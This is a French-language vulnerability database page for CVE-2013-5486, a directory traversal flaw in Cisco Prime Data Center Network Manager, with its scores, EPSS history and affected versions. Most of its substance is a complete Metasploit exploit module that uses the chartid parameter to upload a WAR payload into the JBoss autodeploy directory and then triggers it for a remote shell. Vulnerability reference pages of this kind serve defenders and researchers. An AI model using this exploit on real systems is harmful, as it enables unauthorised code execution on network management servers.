CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Directory traversal vulnerability in processImageSave.jsp in DCNM-SAN Server in Cisco Prime Data Center Network Manager (DCNM) before 6.2(1) allows remote attackers to write arbitrary files via the chartid parameter, aka Bug IDs CSCue77035 and CSCue77036. NOTE: this can be leveraged to execute arbitrary commands by using the JBoss autodeploy functionality.
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
79.62%
–
–
2022-03-13
–
–
78.27%
–
–
2023-02-26
–
–
76.69%
–
–
2023-03-12
–
–
–
97.34%
–
2023-05-07
–
–
–
97.4%
–
2023-08-06
–
–
–
97.36%
–
2023-09-24
–
–
–
97.18%
–
2023-12-31
–
–
–
97.25%
–
2024-02-18
–
–
–
97.29%
–
2024-04-14
–
–
–
97.13%
–
2024-06-02
–
–
–
97.13%
–
2024-06-16
–
–
–
97.19%
–
2024-08-25
–
–
–
97.27%
–
2024-10-20
–
–
–
97.25%
–
2024-12-22
–
–
–
96.6%
–
2025-02-23
–
–
–
96.67%
–
2025-01-19
–
–
–
96.6%
–
2025-02-23
–
–
–
96.67%
–
2025-03-18
–
–
–
–
87.51%
2025-03-30
–
–
–
–
88.68%
2025-03-30
–
–
–
–
88.68,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2013-12-02 23h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#{filename}%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
Products Mentioned
Configuraton 0
Cisco>>Prime_data_center_network_manager >> Version 4.1\(2\)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(2\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(3\)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(3\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(4\)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(4\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(5\)
Cisco>>Prime_data_center_network_manager >> Version 4.1\(5\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 4.2\(1\)
Cisco>>Prime_data_center_network_manager >> Version 4.2\(1\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 4.2\(3\)
Cisco>>Prime_data_center_network_manager >> Version 4.2\(3\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.0\(2\)
Cisco>>Prime_data_center_network_manager >> Version 5.0\(2\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.0\(3\)
Cisco>>Prime_data_center_network_manager >> Version 5.0\(3\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(1\)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(1\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(2\)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(2\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(3u\)
Cisco>>Prime_data_center_network_manager >> Version 5.1\(3u\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2\)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2a\)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2a\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2b\)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2b\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2c\)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2c\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2e\)
Cisco>>Prime_data_center_network_manager >> Version 5.2\(2e\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 6.1\(1a\)
Cisco>>Prime_data_center_network_manager >> Version 6.1\(1a\) (Open CPE detail)
Cisco>>Prime_data_center_network_manager >> Version 6.1\(1b\)
Cisco>>Prime_data_center_network_manager >> Version 6.1\(1b\) (Open CPE detail)
Configuraton 0
Cisco>>Prime_data_center_network_manager >> Version To (including) 6.1\(1b\)